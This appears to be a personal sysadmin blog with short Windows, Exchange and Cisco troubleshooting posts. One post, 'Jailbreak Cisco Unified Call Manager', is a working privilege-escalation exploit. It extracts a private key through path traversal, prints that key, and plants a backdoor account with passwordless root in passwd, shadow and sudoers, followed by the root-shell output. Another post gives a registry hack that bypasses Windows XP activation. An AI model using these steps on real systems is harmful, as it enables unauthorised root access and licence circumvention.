My Writings. My Thoughts.

can’t add printer due to NT4 policy in effect

2003/2008 Server

, Windows 7, Windows Vista, Windows XP | July 21st, 2010

For some printer models, the manufacturer does not package the drivers so that they can be installed as Additional Drivers on a print server. This is the case for many of the less expensive bubble jet, inkjet and multi-function (e.g. scanner/fax/printer) models. The manufacturers deem these to be “personal” printers for use only on the computer to which they are physically connected (parallel, USB or serial port). The manufacturer often says that printing over the network is “not supported” for these models.

If you attempt to install the drivers for these models as Additional Drivers (see for example Install Additional Driver on older OS), you will get some kind of an error or a request for the driver that can not be satisfied no matter what you do. You may also get an error message stating that there is a policy in effect that doesn’t allow NT4 drivers to be installed.

Unfortunately, there are some models that can not be used over the network because the print device and printer driver have to be in bi-directional communication throughout the printing process. The manufacturer’s documentation does not always make this requirement apparent, although there may be FAQs or other documents on the manufacturer’s web site that state this.

Except for those models discussed in the previous paragraph, you can bypass this problem by adding the printer as a local printer on the client computer and associating the printer with a network printer port (i.e. re-direct it to the printer share on the print server). No harm will be done by trying this approach if it doesn’t work, so it’s usually worth a try.

Here’s how to install a printer locally and re-direct it to a network printer port. These instructions are written for Windows XP. This technique does work with Windows 7, Vista, 2008, and 2003 but the dialogs are a bit different, so you may have to read between the lines.

  • Logon at the client computer with a user account that has administrative rights and permissions on the client computer.
  • Click Start, Printers and Faxes
  • Right click in an empty space in the right pane and select Add Printer
  • Click Next
  • Select the Local Printer… radio button, remove the check mark from Automatically detect and install my Plug and Play printer; click Next
  • Select the Create a new port: radio button; from the Type of port: drop down list, select Local Port; click Next
  • In the Enter a port name: text box, key exactly the UNC name of the network printer (e.g. \\printservername\printersharename); click OK
  • Selecting the appropriate entries from the Manufacturer and Printers columns or click the Have Disk button as appropriate
  • Follow through the rest of the Add Printer wizard.

Jailbreak Cisco Unified Call Manager

Cisco, Hardware | July 15th, 2010

View this post in an external page.

  1. Connect to the administrator CLI using SSH
  2. Run the command file dump sftpdetails ../.ssh/id_dsa. This should give you the private key of the SFTP user:
    admin:file dump sftpdetails ../.ssh/id_dsa
    -----BEGIN DSA PRIVATE KEY-----
    MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl
    6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO
    +6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq
    saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M
    a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y
    bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj
    JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ
    5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav
    fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE
    PSfhcQWR3rOKaYUD85henvE=
    -----END DSA PRIVATE KEY-----
    
  3. Create a file on your local machine, containing the private key just obtained. We will use c:\temp\id.ots in this example.
    C:\>copy con c:\temp\id.ots
    -----BEGIN DSA PRIVATE KEY-----
    MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl
    6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO
    +6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq
    saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M
    a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y
    bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj
    JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ
    5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav
    fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE
    PSfhcQWR3rOKaYUD85henvE=
    -----END DSA PRIVATE KEY-----
    ^Z
            1 file(s) copied.
    
  4. If you are using PuTTY, you will have to change the key format from OpenSSH to PuTTY using:
    C:\> puttygen c:\TEMP\id.ots
    

    Save the private key (with or without passphrase) to another file, e.g. c:\temp\id.ppk.

  5. Employ your favorite SFTP tool to connect as sftpuser to your CUCM. Here, we are using psftp.exe from the PuTTY team:
    C:\>psftp -2 -i c:\TEMP\id.ppk sftpuser@cucm.example.com
    Using username "sftpuser".
    Remote working directory is /home/sftpuser
    psftp>
    
  6. Get the file sftp_connect.sh:
    psftp> get sftp_connect.sh
    remote:/home/sftpuser/sftp_connect.sh => local:sftp_connect.sh
    psftp>exit
    
  7. You can open the file locally now in your favorite editor. Add the following lines after the first line. Make sure that your editor understands the difference between Windows and UNIX line endings! You can use UltraEdit for that task.
    chattr -i /etc/passwd
    chattr -i /etc/shadow
    echo 'jail:x:1337:1337::/tmp:/bin/bash' >> /etc/passwd
    echo 'jail:$1$knkuI5HP$sNn3SJJ/95E.9iD.vvnyw.:14714:1:99999:7:::' >> /etc/shadow
    echo 'jail ALL=(root) NOPASSWD: /bin/bash' >> /etc/sudoers
    chattr +i /etc/passwd
    chattr +i /etc/shadow
    
  8. Now we connect using the sftpuser again and replace the file sftp_connect.sh:
    C:\TEMP\>psftp -2 -i c:\TEMP\id.ppk sftpuser@cucm.example.com
    Using username "sftpuser".
    Remote working directory is /home/sftpuser
    psftp> del sftp_connect.sh
    rm /home/sftpuser/sftp_connect.sh: OK
    psftp> put sftp_connect.sh
    local:sftp_connect.sh => remote:/home/sftpuser/sftp_connect.sh
    psftp> chmod 555 sftp_connect.sh
    /home/sftpuser/sftp_connect.sh: 0644 -> 0555
    psftp>exit
    
  9. Back in the CUCM administrator CLI, we execute the command file get tftp os7920.txt to trigger our enhanced script. Yes, the command line says TFTP, not SFTP, that’s correct. Never mind. It doesn’t actually matter what you answer to the CLI questions, as long as the file (e.g. os7920.txt) exists and you answer y to the first question.
    admin:file get tftp os7920.txt
    Please wait while the system is gathering files info ...done.
    Sub-directories were not traversed.
    Number of files affected: 1
    Total size in Bytes: 22
    Total size in Kbytes: 0.021484375
    Would you like to proceed [y/n]? y
    SFTP server IP: doesNotMatter
    SFTP server port [22]:
    User ID: SoonToBeRoot
    Password: ***
    
    Download directory: InYourFace
    
    Could not connect to host doesNotMatter on port 22. Please verify SFTP settings.
    admin:
    
  10. Finally, you can connect to your CUCM using SSH, the user name jail and the password break and elevate your privileges by using sudo /bin/bash:
    login as: jail
    jail@cucm.example.com's password:
    
    -bash-3.00$ sudo /bin/bash
    bash-3.00# id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    bash-3.00#
    

OWA – ‘gtLV’ is null or not an object

Exchange 2007, Internet Explorer, Scripts, Web Applications

| July 15th, 2010

I was getting the “gtLV’ is null or not an object” message when I replied to an email using our Microsoft Online Hosted Exchange email account. Ironically enough, the problem would always occur when I replied to a new email from a Microsoft support engineer. The email would go through but I would get the “ ’gtLV’ is null or not an object” error message popup on the screen. If I replied to the email again the problem would not occur. A very similar message can be seen in the Microsoft Exchange Server forums where I also posted the provided solution.

After many emails to the very patient support tech at Microsoft (as I would reply and then send an email to let him know if the reply worked or not) we escalated the ticket and I got back the following resolution.

1. type regedit on command prompt or run
2. go to: HKCU\Software\Microsoft\Internet Explorer\Main
3. create TabProcGrowth (string or dword) and set the value to 0

This solution worked for me.  From what I can see at the ie8blog this has the side effect of reducing the protectedmode protection and I think the browser tabs use the same process rather than running in seperate processes.  This is a slight downside, but I doubt many users will care – they’re more than happy to have OWA working.

Cisco ATA 186 and 10.1.1.1

Cisco, Hardware

| May 11th, 2010

If you notice any issues on your firewall regarding your ATA 186, it’s most likely because of a factory hardware error that causes the ATA to try to create a route to a nonexistant CCM at 10.1.1.1 as a backup. Find the IP of your ATA and type it in your browser and add /dev behind the url. On the SCCP page, change both CCM addresses to your addresses. If you only have 1 CCM, put it in both boxes.

roaming profiles corruption

Active Directory, Windows XP | April 29th, 2010

Some of the newer software out can cause handles to remain open during the logoff event. Smarttech smartboards come with a program called Notebook which is notorious for locking directories. Disabling the following services can fix alot of roaming profile issues. Adding DelProf.exe to your logoff script in Active Directory is also a nice addition to keep roaming profiles working correctly.

Windows Search Service and WebClient Service (webdav)

can’t change ie8 default search provider

Internet Explorer

| April 15th, 2010

IE8 in some situation disallows changing the default search provider. This can happen on workgroups and domains even if the “restrict changing search provider” gpo is not configured.

  • Make sure IE 8 is closed then navigate to registry key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • Add a new “Expandable String value” inside the above mentioned key with a value name of “AppData” and a value data of “%USERPROFILE%\Application Data”.
  • Reopen IE 8 and see if you still get the error message.
  1. e sure IE 8 is closed then navigate to registry key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  2. Add a new “Expandable String value” inside the above mentioned key with a value name of “AppData” and a value data of “%USERPROFILE%\Application Data”.
  3. Reopen IE 8 and see if you still get the error message.

KnowledgeTree Dropbox

Web Applications

| April 15th, 2010

ISSUE:

In certain environments, after an upgrade to KnowledgeTree 3.6.x, an issue with permissions on the “var” directory and sub directories results in the following exception error:
<ErrorReport Project=”BaobabClient”> <UserReport Short=”Exception found [mkdir() [<a href=’function.mkdir’>function.mkdir</a>]: Permission denied].”>

This also applies to a problem while uploading a document when the message “Initializing, please wait …” appears at the “Metadata Capture” screen and  the permission denied message when connecting Dropbox to your KT url.

To resolve this issue, check the following:

1. The user running the apache server should have correct permissions on the following folder and sub folders: <KnowledgeTree Directory>\var

2. Navigate to DMS Administration > System Configuration > General Settings > Urls > Var Directory and check that the path to the var directory is pointing correctly at your <KnowledgeTree Directory>/var folder

The above steps should resolve this issue on Windows and most Linux installs. For Linux users still encountering a problem, continue to Step 3.

3. Check that the following directory exists: <KnowledgeTree Directory>/var/proxies/nobody

If not, run the following commands from the terminal in order to create and set permissions for this directory:
mkdir <Path to KnowledgeTree directory>/var/proxies/nobody
chown nobody <Path to KnowledgeTree directory>/var/proxies/nobody

Activate/WGA fix for Windows XP

Active Directory | April 14th, 2010

  • Open regedit
  • Find HKEY Local\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents
  • Find the string OOBETimer
  • Double click and change the value to this one: FF D5 71 D6 8B 6A 8D 6F D5 33 93 FD
  • Right click on WPAEvents and choose permissions
  • Change “system” and check deny all
  • Restart Your PC

user profile service failed the logon

Windows 7, Windows 8, Windows Vista | March 12th, 2010

To reset a corrupt profile in Vista/7/8:

  • Open regedit with administrator rights
  • Find HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
  • Delete the root key that includes the username you want to reset (DONT remove the others)
  • Rename or remove the username directory under c:\users
  • Reboot and log the user on to recreate the profile, reboot again to apply GPO’s if it’s a domain workstation

peerblock

Security | March 9th, 2010

For those that have used peer guardian exclusively for the past few years, phoenix labs has release their new product, peerblock. PeerBlock lets you control who your computer “talks to” on the Internet.  By selecting appropriate lists of “known bad” computers, you can block communication with advertising or spyware oriented servers, computers monitoring your p2p activities, computers which have been “hacked”, even entire countries!  They can’t get in to your computer, and your computer won’t try to send them anything either.

Download peerblock.